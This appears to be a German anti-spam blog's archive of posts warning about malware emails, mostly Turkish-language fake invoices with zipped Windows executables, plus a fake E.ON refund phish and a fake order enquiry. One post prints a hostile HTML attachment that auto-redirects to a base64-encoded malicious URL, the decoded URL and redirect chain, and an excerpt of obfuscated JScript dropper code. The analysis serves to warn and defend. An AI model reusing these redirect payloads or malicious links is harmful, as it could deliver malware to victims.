Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.

Schlagwortarchiv „Schadsoftware“

Onaylanmış beyan

Donnerstag, 8. Dezember 2022

⚠️ SCHADSOFTWARE ⚠️ Kötü amaçlı yazılım ⚠️

Auf gar keinen Fall den Anhang öffnen! Postanın ekini asla açmayın! 💀️

Aber ich kann gar kein Türkisch. 😉️

Merhaba,

Genau mein Name!

Firmanıza ait onaylı beyanname görseli ektedir. Kontrol etmeniz rica olunur. Ümit Bey size vergi ve ambar ödeme makbuzlarını ve araç bilgilerini gönderecektir.

İYİ ÇALIŞMALAR

S.Yiğit KOÇAK

ER-AL GÜMRÜK MÜŞAVİRLİĞİ LTD.ŞTİ.

ATAKÖY 7-8-9-10 KISIM MAH. ÇOBANÇEŞME E-5 YANYOL CAD.

NO 18/1 SELENIUM RETRO A BLOK KAT 12 DAİRE 142

BAKIRKÖY / İSTANBUL

TEL: 0212 258 ■■ ■■ -■■ -■■ FAX: 0212 258 ■■ ■■

e-mail: er-al@er-algumruk.com

web: www.er-algumruk.com

Statt irgendwelcher Unterlagen ist im Anhang ein ZIP-Archiv, und das…

$ 7z l Onaylanmış\ beyan.zip 

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=de_DE.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz (306C3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 324409 bytes (317 KiB)

Listing archive: Onaylanmış beyan.zip

--
Path = Onaylanmış beyan.zip
Type = zip
Physical Size = 324409

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2022-12-08 09:22:35 ....A       335789       324231  Onaylanmış beyan.exe
------------------- ----- ------------ ------------  ------------------------
2022-12-08 09:22:35             335789       324231  1 files
$ _

…enthält ebenfalls keine Unterlagen, sondern eine ausführbare Datei für Microsoft Windows. Diese wurde von einem Spammer mit einer irreführend formulierten Spam zugestellt. Man muss nicht lange nachdenken, um zu bemerken, dass es das reinste Gift sein wird. ☣️

Diese klare Schadsoftware wird zurzeit nur von rd. einem Drittel der gängigen Antivirus-Schlangenöle als Schadsoftware erkannt. Zum Glück sollten nahezu hundert Prozent der Gehirne dazu imstande sein, diesen Sondermüll ungelesen in das Tönnchen zu schieben. Oder? ODER? 😱️

Seit Mitte Oktober habe ich immer wieder einmal türkischsprachige Spam im Pesteingang, und die hatte bis jetzt immer einen Schadsoftware-Anhang. Einmal wäre ein Versuch und als solcher nicht aussagekräftig, zweimal ist schon ein Trend und dreimal ist ein Hinweis darauf, dass die Verbrecher glauben, neue Opfer gefunden zu haben und vermutlich auch ganz viel Erfolg bei ihrer neuen „Zielgruppe“ haben. Ich kann leider – trotz meiner Ghetto-Sozialisation am Rande des deutschen Sprachraums mitten in Deutschland – kein Wort Türkisch¹ und deshalb nicht so klar und unmissverständlich warnen wie bei den deutschen Spams mit Schadsoftware. Vom Humor – oder dem, was ich dafür halte – ganz zu schweigen. Wenn ich eine solche Spam an eine deutsche Mailadresse sehe, gehe ich davon aus, dass damit die rd. 2,7 Millionen Menschen türkischer Herkunft², die in der Bundesrepublik Deutschland leben, kriminell überrumpelt werden sollen. Dass diese Menschen, die leider oft nicht so gut deutsch können, über die Machenschaften der Kriminellen gut informiert sind, halte ich für illusorisch. Nicht einmal die Deutschen sind gut genug informiert. ☹️

Und dann werden die Computer der vielen türkischen Gewerbetreibenden eben mit Erpressungstrojanern lahmgelegt, und wer kein Backup hat, muss Bitcoin zahlen, um wieder an die Daten zu kommen. Man kann mit Geld immer etwas Besseres anfangen, als es solchen asozialen Idioten von Spammern zu geben. 💸️

¹Na gut, ein paar Schimpfwörter schon…

²Darunter auch Kurden und andere Minderheiten aus der Türkei, die sich selbst nicht als Türken bezeichnen würden, aber ich habe keine Lust, dafür ein schönes zusammenfassendes Wort zu suchen.

fatura onayı

Dienstag, 25. Oktober 2022

⚠️ Schadsoftware ⚠️ kötü amaçlı yazılım ⚠️

Oh, schon wieder eine Rechnung auf Türkisch? Sollen jetzt die ganzen türkischen Kleinbetriebe um Lösegeld für ihre Daten erpresst werden? Glauben die Spammer, dass „die Türken“ dumm sind und einfach unüberlegt auf alles klicken? 🤔️

Von: Sami Hatipoğlu <shatipoglu@oyakinsaat.com.tr>
An: gammelfleisch@tamagothi.de

Im Töpfchen für Sieger! 🚽️

Merhaba

gerekli düzeltmeleri yapabilmemiz için lütfen talep ettiğiniz faturanın doğru olup olmadığını onaylayın.

İyi iş

Sami HATİPOĞLU

Satınalma Sorumlusu

Tandoğan Projesi

Eti mahallesi GMK Bulvarı No: 138

06570 Çankaya / ANKARA

Tel: (536) 355 xx xx

An der Mail hängt ein Anhang, ein ZIP-Archiv:

$ ls -lh fatura\ onayı.zip 
-rw-r–r– 1 elias elias 203K Okt 25 14:44 'fatura onayı.zip'
$ unzip -l fatura\ onayı.zip 
Archive:  fatura onayı.zip
  Length      Date    Time    Name
———  ———- —–   —-
   219021  2022-10-25 06:03   fatura onayı.exe
———                     ——-
   219021                     1 file
$ _

Mit Stable Diffusion generiertes abstraktes Bild eines gruseligen WesensDer Inhalt ist kein Dokument, sondern eine ausführbare Datei für Microsoft Windows, die unter einem Vorwand zugemailt wurde. Wer darauf doppelklickt und dieses an alle möglichen Mailadressen zugestellte Programm irgendwelcher Verbrecher ausführt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. ☹️

Bitte nicht darauf reinfallen und auf keinen Fall den Anhang öffnen! Lütfen buna kanmayın ve eki asla açmayın! 🖱️🚫️

Wie so oft, gilt auch diesmal: Antivirus-Schlangenöl hilft nicht. Diese aktuelle Schadsoftware wird von weniger als einem Drittel der Antivirus-Programme als Schadsoftware erkannt. Wer sich darauf verlassen hat, ist verlassen. 😱️

Revize fatura

Mittwoch, 19. Oktober 2022

Oh, jetzt werde ich schon auf Türkisch¹ zugespammt? 🤨️

Merhaba

Normalerweise würde ich ja sagen: Genau mein Name! Aber heute sage ich mal: Genau meine Sprache! 🤭️

Fatura önceden onaylandı, lütfen imzalayın ve geri gönderin, böylece ödemelerin ödenmesine başlayalım

İyi iş

Was für eine Rechnung denn? Ich habe nichts gekauft und nichts bestellt. Und wenn der Absender wirklich wollte, dass man eine Rechnung bezahlt, dann würde er schon den Rechnungsbetrag und die Bankverbindung in den Text der Mail schreiben. 🤔️

Aber stattdessen muss ich hier einen Anhang öffnen, wenn ich wissen will, wofür ich wieviel an wen bezahlen soll und um was zum hackenden Henker es überhaupt geht. Einen Anhang in einer E-Mail eines Unbekannten (der Absender kann beliebig gefälscht werden) zu öffnen, ist dumm und gefährlich. ⚠️

Zisan DEMIR
SEMKİM Paint and Chemistry Inc.
Kemalpasa OSB mah. 508 St. No:320
P: 35730; Kemalpasa / IZMIR
M: +09 532 621 ■■■■
T: +90 232 878 ■■■■■
zisandemir@semkim.com.tr
www.semkim.com.tr

Ich bin übrigens der Weihnachtsmann. 🎅️

Es ist hoffentlich jedem Menschen klar, dass ein Krimineller in ein solches Mailimpressum beliebige Daten anderer Menschen und Unternehmen angeben kann. Bei Semkim möchte ich heute jedenfalls nicht am Telefon sitzen, denn ich bin ganz sicher nicht der einzige Empfänger dieser Spam, und das Telefon wird wohl ordentlich bimmeln. Dass dadurch wirtschaftlicher Schaden bei einem unbeteiligten Dritten entsteht, ist einem asozialen kriminellen Spammer egal, wenn dabei nur sein asoziales Geschäft läuft. 🤮️

An der Mail hängt auch nicht etwa ein Dokument, sondern ein ZIP-Archiv mit einer Dateigröße von 241,7 KiB. In diesem Archiv befindet sich auch kein Dokument, sondern…

$ ls -lh *.zip
-rw-rw-r– 1 elias elias 242K Okt 19 15:08 'Revize fatura.zip'
$ unzip -l Revize\ fatura.zip
Archive:  Revize fatura.zip
  Length      Date    Time    Name
———  ———- —–   —-
   261699  2022-10-19 04:53   Revize fatura.exe
———                     ——-
   261699                     1 file
$ unzip Revize\ fatura.zip 
Archive:  Revize fatura.zip
  inflating: Revize fatura.exe       
$ file Revize\ fatura.exe 
Revize fatura.exe: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
$ _

Gruseliges Bild, das mit Stable Diffusion erzeugt wurde…eine ausführbare Datei für Microsoft Windows, die von einem Unbekannten mit einer Lüge zugestellt wurde. Auch, wenn das Piktogramm des Programmes sicherlich wie ein Dokument aussehen wird², damit überhaupt jemand darauf reinfällt: Ein Doppelklick auf die entpackte Datei öffnet kein Dokument, sondern führt das Programm eines Kriminellen aus. Danach steht ein Computer anderer Leute auf dem Schreibtisch. ☹️

Antivirus-Programme helfen nur sehr eingeschränkt. Im Moment wird die klare Schadsoftware nur von einem Fünftel der Antivirus-Programme als Schadsoftware erkannt. 😵️

Wer sich darauf verlässt, durch sein Antivirus-Programm geschützt zu sein, ist in vielen Fällen verlassen. Und das gilt leider sehr regelmäßig. Antivirus-Programme können nur vor Schadsoftware schützen, die bei den Herstellern der Antivirus-Programme schon bekannt ist. Selbst eine für einen analysierenden Menschen sehr ähnlich aussehende Schadsoftware wird regelmäßig nicht erkannt. In solchen an Kleingewerbe und Mittelstand gerichteten Spams wird beinahe immer die neueste Brut der Kriminellen versendet. Denn die Kriminellen sind darauf angewiesen, dass sie Rechner mit ihrer Schadsoftware übernehmen. Sie leben davon. Deshalb wissen solche Kriminelle auch immer recht genau, was von Antivirus-Programmen nicht erkannt wird. Weil sie davon leben, dass es nicht erkannt wird. 😠️

Man kann sich das Antivirus-Schlangenöl in sehr vielen Fällen einfach sparen, wenn man stattdessen vernünftig und sicher mit einem Computer umgeht. Wie man das macht? Das habe ich schon im zuvor verlinkten Text beschrieben. Es ist auch gar nicht so schwierig. Ein sehr wichtiger Bestandteil des vernünftigen und sicheren Umgangs mit Computern ist es, dass man niemals einfach in eine E-Mail klickt. Das schützt nicht nur vor Schadsoftware, sondern auch vor Phishing, dem immer noch häufigsten Trickbetrug im Internet. E-Mail ist sehr praktisch, aber leider auch für Kriminelle. 😐️

Wer sein Gehirn benutzt und einfach keine Anhänge öffnet und keine Links klickt, die ihm per E-Mail zugestellt werden, ohne dass dies über einen anderen Kanal als E-Mail vereinbart wurde, ist auf der sicheren Seite. Es ist kaum möglich, eine giftige Datei unterzuschieben. 🛡️

Noch besser und praktischer im Alltag wäre nur die durchgehende Benutzung (und Überprüfung) digitaler Signaturen, um immer jenseits jedes vernünftigen Zweifels zu wissen, von wem eine E-Mail stammt³. Aber das ist den Menschen leider auch im Jahr 2022 noch zu kompliziert, denn dafür muss man ja klicken können. 🖱️

Erpresser, die Daten verschlüsseln und ein Lösegeld für die Daten erpressen wollen, freuen sich sehr darüber, wenn möglichst viele Menschen digitale Analphabeten sind. Ich meine dieses Wort übrigens nicht als Beschimpfung. Sie haben es einfach nicht gelernt, so wie man zum Beispiel Schreiben und Rechnen lernt, obwohl es eine wichtige Fähigkeit im 21. Jahrhundert wäre. Die tägliche digitale Verdummung von Menschen in Schule, Presse und Glotze ist Kriminalitätsförderung. Gestalten wie Frau Prof. Dr. Kristina Sinemus (CDU), Digitalministerin des Landes Hessen, nebst der korrupten Parteioligarchie, die so viel krachende Inkompetenz aus der lodernden Hirnhölle völliger Ahnungslosigkeit in Amt, Würden und vor allem in die Pfründe gehoben hat, sind offene und schamlose Kriminalitätsförderer. 🤬️

Aber die Verdummung wirkt ja ganz gut, denn so etwas wird leider trotzdem immer wieder gewählt. ☹️

¹Nein, ich kann trotz Ghetto-Sozialisation praktisch kein Türkisch (bis auf ein paar Phrasen und Schimpfwörter), aber DeepL ist sehr hilfreich…

²Ich habe hier kein Programm installiert, mit dem ich die Ressourcen aus einem Windows-Binary extrahieren kann, weil ich so etwas nicht brauche, und ich habe auch keine Lust, jetzt „auf die Schnelle“ ein entsprechendes Programm zu suchen. Ich gehe davon aus, dass entweder das Icon eines Office-Dokumentes oder das Icon eines PDF-Dokumentes verwendet wurde, um den Empfänger über den wahren Dateitypen zu täuschen. Man kann einem ausführbaren Programm für Windows jedes beliebige Icon geben. Diese Spammer leben davon, dass Menschen auf sie reinfallen.

³Eigentlich erfährt man nur, dass die E-Mail von jemanden stammt, der Zugriff auf einen bestimmten privaten Schlüssel hat und dass ihr Text auf dem Transportweg nicht verändert wurde – aber das wäre im Alltag mehr als nur ausreichend und ein hervorragender Ersatz für ein Nichts an rationalen Vertrauensgrundlagen. Die Absenderadresse einer E-Mail kann beliebig gefälscht werden. Man kann einfach reinschreiben, was man möchte, ohne dass das bemerkt wird. Ganz ähnlich, wie man auch auf einen Briefumschlag einen beliebigen Absender schreiben kann, und der Brief kommt trotzdem an.

Ihre Rechnung 146648577349 von der Böttcher AG

Freitag, 30. September 2022

⚠️ Warnung, Schadsoftware! Auf gar keinen Fall den Anhang klicken! ⚠️

Von: Böttcher AG <no-reply@glenat.com>
An: undisclosed-recipients: ;

So so, eine Rechnung, die an ganz viele Empfänger auf einmal geht. 😂️

Natürlich kommt diese Spam nicht von der Böttcher AG, sondern von schwerkriminellen Spammern, die Rechner anderer Leute mit Schadsoftware übernehmen wollen. Bevorzugt kleine und mittelständische Unternehmen. Denen droht dann oft die Insolvenz, und dann werden Erpresser halt bezahlt. 😕️

Ihre Rechnungsnummer: 146648577349
Ihre Kundennummer: 646756981732962

Lieber Kunde,

Hach, so viele schöne Zahlen, aber der einzige Name, den ich habe, ist „Lieber Kunde“. Die scheinen ihre Kunden aber nicht zu mögen. 😁️

beiliegend erhalten Sie Ihre Rechnung als HTML-Dokument.

Ah ja! Da ist ja tatsächlich ein Anhang dran. Da steht aber nicht so viel drin. Der ist nur eine Weiterleitung zu einer base64-codierten URL. Na gut, fange ich mal an – wie üblich arbeite ich mit meiner Kommadozeile unter Linux:

$ cat Rechnung-b-a_0000003198.html 
<body id="kqisC2MKfeohSuvlhlQyUmZZdlUGTxyDYNrBPoW05qdsUurHk2yYsHp4DgvqGBSbC5Aut1qSVdJDugOkeNeshVsoPBGnbKJ3UCLXYnFs4Bu" onpageshow="document.location.href=window.atob('aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M=');">
$ echo aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M= | base64 -d; echo 
https://3t8.at/apD8qloS
$ mime-header https://3t8.at/apD8qloS | grep -i ^location
location: https://info-opensocial.googleusercontent.com/gadgets/ifr?url=https://hatcherlawgroup.com/img/inf/inf
$ _

Ab jetzt geht es nur noch mit einem richtigen Browser weiter, weil zum Zugriff auf die gängelnde und gefährliche Google-Cloud leider Javascript benötigt wird. Ja, dieser hochgefährliche Sondermüll wird anonym und kostenlos in der Cloud eines Google-Kontos gehostet. Ist es nicht „schön“, wie einfach das alles geworden ist? Hier ist längst ein Paradies für Kriminelle entstanden. Ich habe mir mal den Spaß gemacht und in einer virtuellen Maschine den Download gemacht. Die Datei ist ein ZIP-Archiv, das es in sich hat:

$ ls -lh *.zip
-rw-rw-r– 1 elias elias 96K Sep 30 15:21 5640955135.zip
$ zip -sf 5640955135.zip 
Archive contains:
  xi1132111.js
Total 1 entries (418953 bytes)
$ unzip 5640955135.zip 
Archive:  5640955135.zip
  inflating: xi1132111.js  
$ _

Dettelbach ist überall! 😱️

Diese Datei ist kein Dokument, sondern Programmcode, der nach klicki-klicki Doppelklick vom Windows Script Host ausgeführt wird. Dieser Programmcode ist ausgesprochen kryptisch formuliert und…

$ wc xi1132111.js 
     2    373 418953 xi1132111.js
$ _

…steht in lediglich zwei Zeilen, die aber insgesamt rd. 420 Kilobyte Javascript-Programmcode enthalten. 😮️

Um einen Eindruck davon zu vermitteln, wie vorsätzlich schwierig analyisierbar und kryptisch dieses Programm gecodet ist, gebe ich hier mal das erste Kilobyte aus und füge nach jedem Komma einen Zeilenumbruch ein, damit man es noch bequem lesen kann:

$ dd status=none if=xi1132111.js bs=1024 count=1 | sed 's/,/,\n/g'; echo 
function _0×3cd5(){var _0×11cf11=['\x2f\x67\x2c\x66\x5b\x31\x46\x5d\x29\x29\x3b\x31\x67\x3d',
'\x6a\x70\x66\x57\x51',
'\x79\x5c\x5a\x22\x2c\x22\x5c\x6a\x5c\x6d\x22\x2c\x22\x5c',
'\x56\x6b\x72\x7a\x62',
'\x5c\x6b\x22\x2c\x22\x5c\x74\x5c\x31\x62\x22\x2c\x22\x5c',
'\x4f\x6f\x4d\x6c\x57',
'\x4d\x41\x58\x41\x73',
'\x5c\x63\x5c\x68\x5c\x73\x5c\x63\x5c\x59\x5c\x63\x5c\x63',
'\x75\x5d\x2b\x66\x5b\x31\x76\x5d\x2b\x66\x5b\x31\x6d\x5d',
'\x61\x5c\x62\x5c\x62\x5c\x61\x5c\x62\x5c\x53\x5c\x4a\x5c',
'\x6a\x61\x61\x67\x70',
'\x7c\x7a\x6d\x42\x45\x6f\x52\x53\x64\x7c\x78\x34\x42\x7c',
'\x61\x77\x6e\x6c\x69',
'\x49\x65\x52\x45\x67',
'\x5c\x73\x5c\x63\x5c\x43\x5c\x63\x5c\x70\x5c\x61\x5c\x69',
'\x72\x4d\x79\x54\x48',
'\x49\x6d\x77\x47\x67',
'\x42\x69\x74\x77\x49',
'\x5c\x75\x5c\x6e\x5c\x6d\x5c\x72\x5c\x61\x5c\x64\x5c\x6b',
'\x77\x7a\x77\x47\x71',
'\x61\x5c\x62\x22\x2c\x22\x5c\x65\x5c\x61\x5c\x62\x5c\x64',
'\x5c\x6b\x22\x2c\x22\x5c\x6a\x5c\x55\x5c\x70\x5c\x61\x5c',
'\x5c\x2b\x5c\x2b\x20\x2a\x28\x3f\x3a\x5b\x61\x2d\x7a\x41',
'\x5c\x6f\x5c\x78\x5c\x63\x5c
$ _

Von einem neuronalen Netzwerk generiertes Bild einer verlassenen industriellen Anlage, die überall mit Blut verschmiert istSo etwas führt man doch gern auf seinem Computer aus, gelle? Vor allem, wenn es aus einer fragwürdigen Mail kommt, die von einer Rechnung faselt, aber nicht einmal eine persönliche Ansprache beinhaltet. Natürlich sollte man solchen Code nicht ausführen, auch nicht, wenn man dafür nur eine Datei doppelklicken muss. Man sollte generell E-Mail nur mit der Kneifzange anfassen. E-Mail ist sehr praktisch, das aber leider auch für Kriminelle. Wer niemals einen Anhang öffnet, der nicht vorher über ein anderes Medium als E-Mail explizit abgesprochen wurde, tut viel für seine Computersicherheit. 🛡️

Es wird sich mit an Sicherheit grenzender Wahrscheinlichkeit um Schadsoftware handeln. Diese Schadsoftware ist die neueste Brut der Kriminellen, sie wird im Moment nur von einem sehr kleinen Bruchteil der Antivirus-Programme erkannt. Zur Verdeutlichung habe ich auch einen Screenshot von VirusTotal von heute, 15:54 Uhr gemacht, weil ich hoffe, dass sich die Erkennungsrate schon in den nächsten Stunden deutlich verbessert. Das gesamte Antivirus-Schlangenöl wird also einmal mehr nicht helfen. 💀️

Vermutlich sind jetzt bereits die Netzwerke von hunderten bis tausenden Betrieben von Kriminellen übernommen worden, und in Kürze werden überall die Erpressungstrojaner Geld einfordern. Das wird Kosten verursachen und vielleicht sogar die eine oder andere Insolvenz zur Folge haben. 😵️

Auf eine Abuse-Meldung bei Google habe ich verzichtet. Ich bin nicht so ein Freund kafkaesker Erfahrungen. Stattdessen habe ich die giftige Mail an das Landeskriminalamt Niedersachsen weitergeleitet. 👮‍♂️️

Sobald Ihre Ware (Lagerware) unser Logistikzentrum verlassen hat, erhalten Sie per E-Mail eine Versandbenachrichtigung mit Link zur Sendungsverfolgung.

Den Status Ihrer Bestellung können Sie jederzeit in unserem Onlineshop www.bueromarkt-ag.de unter Mein Konto – Meine Bestellungen einsehen.
Fehlende Artikel werden automatisch nachgeliefert.

Wenn Sie einen Artikel zurücksenden möchten, nutzen Sie bitte unsere Online-Rückgabe unter Mein Konto – Rücksendung & Reklamation.

Für Rückfragen stehen wir Ihnen gern zur Verfügung.
Vielen Dank für Ihren Auftrag.

Bitte antworten Sie nicht auf diese Nachricht, da sie automatisch von einem Postfach generiert wurde, welches keine eingehenden e-Mails empfangen kann.

Mit freundlichen Grüßen

⚠️ Bitte auf gar keinen Fall darauf reinfallen! ⚠️

Letzte Warnung! Ein Betrag steht für Sie bereit.

Donnerstag, 29. September 2022

Von: E.ON <administrator@ssmgctrainingcentre.com>
An: gammelfleisch@tamagothi.de

Der Absender ist nicht E.ON, und der Empfänger bin nicht ich. Denn so verdorben wie diese Mailadresse bin ich noch nicht. 😉️

Es ist eine Spam, die mindestens an jede Mailadresse geht, die Spammer irgendwo im Web einsammeln können. Es gibt kein Geld von E.ON. Es ist eine Lüge, mit der Empfänger dazu überrumpelt werden sollen, in die Spam zu klicken.

Sehr geehrter Herr / Frau,

E.ON wüsste, wie seine Kunden heißen.

Aufgrund der Situation in der Ukraine und des unsicheren und hohen Gaspreises erreichen uns derzeit viele Fragen und das ist logisch. Als Unternehmen sind wir verpflichtet, unseren Kunden die richtigen und erschwinglichen Preise anzubieten.

E.ON ist als börsennotiertes Unternehmen auch nicht seinen Kunden verpflichtet, sondern seinen Aktionären. Und mit Verlaub: Das merkt man! 🤮️

Was bedeutet das fur mich?
Sie haben in den letzten Monaten mehr Gas bezahlt, als Sie verbraucht haben. Wir erstatten Ihnen den Betrag von 591,56 Euro innerhalb von 5 Werktagen auf Ihr Konto zuruck.

E.ON sendet seine Jahresabrechnungen mit eventuellen Nachzahlungen oder Erstattungen zuviel gezahlter Abschlagszahlungen auch mit der Sackpost. An Kunden, die namentlich angesprochen werden. Unter Nennung einer Vertragsnummer. Mit einer klar strukturierten Rechnung, aus der hervorgeht, was gezahlt wurde und wieviel verbraucht wurde. 😉️

Oder sollte E.ON neuerdings schwamming und informell formulierte E-Mail mit „das ist logisch“ und „mehr Gas bezahlt, als Sie verbraucht haben“ versenden und dafür auf eine Rechnung verzichten? Das wäre aber sehr albern und dumm von E.ON. Dafür nehmen die das mit dem Geld viel zu ernst. Die sind ja auch ihren Aktionären verpflichtet… 🤑️

Übrigens kann E.ON auch Umlaute in seine Texte schreiben. 😅️

Was soll ich machen?
Klicken Sie hier, um Ihre Bewerbung einzureichen.

Was man auf gar keinen Fall und niemals machen sollte: In eine E-Mail auf „Click here“ klicken. Es ist immer ein Fehler. Solche Sprachstummel finden sich nur in krimineller Spam und in mieser Reklame. 👎️

Ich sortiere mit einer (leider wegen der vielen derartigen Formulierungen etwas kompliziert geratenen) Click-here-Regel seit vielen Jahren die Spam aus. Es gab in den ganzen Jahren nicht eine einzige falsche Erkennung. Es war alles Müll, der direkt und automatisch ins Klo sortiert werden konnte, ohne dass ich weitere Lebenszeit dafür aufwänden müsste. Denkende und fühlende Menschen, deren Mitteilungen einen Wert haben, schreiben nicht „Click here“ in ihre Mails. 💡️

Und überhaupt: Seit wann muss ich mich eigens „bewerben“, um eine Rechnung von E.ON zu erhalten? 😂️

Ich habe den Link, der sehr kryptisch weitergeleitet wird, so dass ich die Weiterleitungskette nicht automatisiert verfolgen konnte¹, jetzt nicht bis zum bitteren Ende untersucht, weiß aber schon in der Mitte des Weges, dass es hier eine „kostenlose Sicherheitsprüfung“ von Computer, Betriebssystem und Browser durch Kriminelle gibt. Wer durchgefallen ist, hat nach dem Klick einen Computer anderer Leute auf dem Schreibtisch stehen. Was die damit machen, weiß ich nicht. Sie könnten spammen, betrügen, über eine fremde IP-Adresse so genannte „Cyberangriffe“ durchführen, Bilder und Videos von sexuellem Kindesmissbrauch hosten, das Online-Banking manipulieren oder einen Erpressungstrojaner installieren. Alles ganz nach Belieben. Auch gern in Kombination. Und nichts davon wird erfreulich sein. ☹️

Dagegen hilft übrigens am zuverlässigsten ein aktuelles Betriebssystem und aktuelle Software, so leidig die ganze Updaterei auch immer ist. Und natürlich hilft es, wenn man nicht in E-Mail klickt und auch keine Anhänge aus E-Mail öffnet. Antivirus-Schlangenöl hilft nicht, wenn man es mit der neuesten kriminellen Brut zu tun hat. 😉️

Links und Anhänge in E-Mail sind zurzeit der häufigste Transportweg für Schadsoftware. Und so lange Menschen in E-Mail klicken, wird das wohl auch so bleiben. Ich empfehle, nur Links und Anhänge zu öffnen, die vorher auf einem anderen Weg als mit E-Mail abgesprochen wurden, zum Beispiel telefonisch – denn auch die Absenderadresse eine E-Mail kann beliebig und kinderleicht gefälscht werden. Alternativ könnte man natürlich auch durchgehend digitale Signaturen verwenden, aber das ist den Menschen ja zu kompliziert. Dafür müssten sie ja klicken können. 🖱️

Wer noch sicherer gehen will, sollte neben dem für die Computersicherheit unverzichtbaren Werbeblocker auch einen wirksamen Javascript-Blocker im Webbrowser verwenden. Damit werden nahezu alle kriminellen Angriffe auf den Browser abgewehrt². Der Preis dafür ist allerdings, dass man von Hand vertrauenswürdigen Websites erlauben muss, Javascript im Browser auszuführen. Das ist vielen auch zu mühsam. Dafür muss man ja klicken können. 🖱️

Erstaunlich, dass die Menschen immer die paar Klicks hinbekommen, um ein in der Praxis wirkungsloses Antivirus-Schlangenöl zu installieren und sich in gefühlter Sicherheit zu suhlen! 🖱️🤦‍♂️️

Wir hoffen, Sie damit ausreichend informiert zu haben.

Nein. Eine ausreichende Information zu den Kosten eines Vertrages, den ich habe, ist die Rechnung. „Ihr“ habt nur geschwafelt. 😁️

Haben Sie irgendwelche Fragen? Sie konnen uns gerne kontaktieren.

Wie? In einer Séance? Hirntot seid „ihr“ schon. Und irgendwelche Kontaktdaten habt „ihr“ nicht angegeben. ☎️

Mit freundlichen Grussen
E.ON

Wenn das die Freundlichkeit ist, will man den Hass aber auch nicht mehr kennenlernen. 😡️

Entf! 🗑️

¹Da ist viel vorsätzlich unlesbares Javascript im Weg. Das wird gemacht, um eine Analyse zu erschweren, und es funktioniert leider gut. Ich habe nach der vierten Weiterleitung aufgegeben. Trotz des durchwachsenen Wetters weiß ich etwas Besseres mit meiner Lebenszeit anzufangen.

²Es gab in den letzten zehn Jahren in der Praxis nur einen Angriff auf Webbrowser, der kein Javascript-Angriff war. Dabei wurde ein Fehler im integrierten PDF-Viewer des Firefox ausgebeutet. Alle anderen Angriffe auf Webbrowser erforderten Javascript. Ich würde den integrierten PDF-Viewer in einem Browser übrigens nicht benutzen. Er schafft eine unnötige zusätzliche Angriffsfläche, die auch tatsächlich schon einmal zu Angriffen führte. Ich sehe auch nicht, wo der Komfortverlust sein soll, wenn ein PDF nach dem Klick in einem schlanken PDF-Viewer wie Atril geöffnet wird, statt im Fenster eines fetten, überkomplexen Webbrowsers. Wo man so etwas im Firefox einstellt: In den Einstellungen, unter Allgemein, dort unter Anwendungen. Schon ein bisschen versteckt.

NEW ORDER ENQUIRY

Donnerstag, 1. September 2022

Schadsoftwarealarm! ⚠️

Von: Ines Friedl <EXPRESS_ADG@ismarine.com.tr>
An: gammelfleisch@tamagothi.de

Im Töpfchen für Sieger! 🚽️

Hello,

Genau mein Name! 👏️

I am taking over from our purchasing Manager who is on vacation. He sent me your contact information so you can prepare our new order.

Nein, bei mir könnt ihr nichts bestellen. 😀️

Kindly find our attached new drawing and specification, and official order letter, and do urgently review and send us PI based on FOB price.

In der Tat, da sind zwei Anhänge. Ein PDF und ein 7-zip-Archiv. 🙄️

$ ls -l *.pdf *.7z
-rw-rw-r-- 1 elias elias 405211 Sep  1 12:27  Drawing.7z
-rw-rw-r-- 1 elias elias  18733 Sep  1 12:29 'Specificationa and drawing.pdf'
$ file Specificationa\ and\ drawing.pdf 
Specificationa and drawing.pdf: PDF document, version 1.4
$ pdftotext Specificationa\ and\ drawing.pdf - 
Hello,

I am taking over from our purchasing Manager who is on vacation. He sent me your contact
information so you can prepare our new order.

Kindly find our attached new drawing and specification, and official order letter’
Attached below is our drawing and specification.
Look forward to working with you.

Best Reagrds

$ _

In dem PDF, dessen Dateiname übrigens etwas völlig anderes vermuten lässt, steht im Wesentlichen noch einmal der gleiche Quatsch wie in der Spam. Es ist völlig überflüssig, so ein PDF anzuhängen. Fragt sich nur noch, was wohl in diesem 7-zip-Archiv ist:

$ file Drawing.7z 
Drawing.7z: 7-zip archive data, version 0.4
$ 7z l Drawing.7z

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=de_DE.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz (306C3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 405211 bytes (396 KiB)

Listing archive: Drawing.7z

--
Path = Drawing.7z
Type = 7z
Physical Size = 405211
Headers Size = 208
Method = LZMA2:21 BCJ
Solid = +
Blocks = 1

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2022-09-01 08:19:18 D....            0            0  Drawing
2022-09-01 08:17:59 ....A       958464       405003  Drawing/design A.exe
2022-09-01 08:18:27 ....A       958466               Drawing/design B.exe
------------------- ----- ------------ ------------  ------------------------
2022-09-01 08:19:18            1916930       405003  2 files, 1 folders
$ _

Das 7-zip-Archiv enthält zwei ausführbare Dateien für Microsoft Windows, die von einem Unbekannten zugestellt wurden, der einfach irgendwelche im Web eingesammelten Mailadressen mit dieser Spam vollmacht. Wer auf eine dieser beiden Dateien klicki-klicki macht, führt damit auf seinem Computer das Programm eines kriminellen Spammers aus. Hinterher steht ein Computer anderer Leute auf dem Schreibtisch. Im schlimmsten Fall wird ein ganzes Unternehmensnetzwerk mit Verschlüsselungs- und Erpressungstrojanern übernommen, die Daten des Unternehmens werden zukünftig unter Kriminellen gehandelt und ein Schaden in enormer Höhe entsteht, der sogar in die Insolvenz führen kann. Ich hoffe, ich muss nicht mehr dazu sagen. Es handelt sich völlig klar um eine Schadsoftware. ☣️

Deshalb ist man äußerst vorsichtig mit E-Mail! 💡️

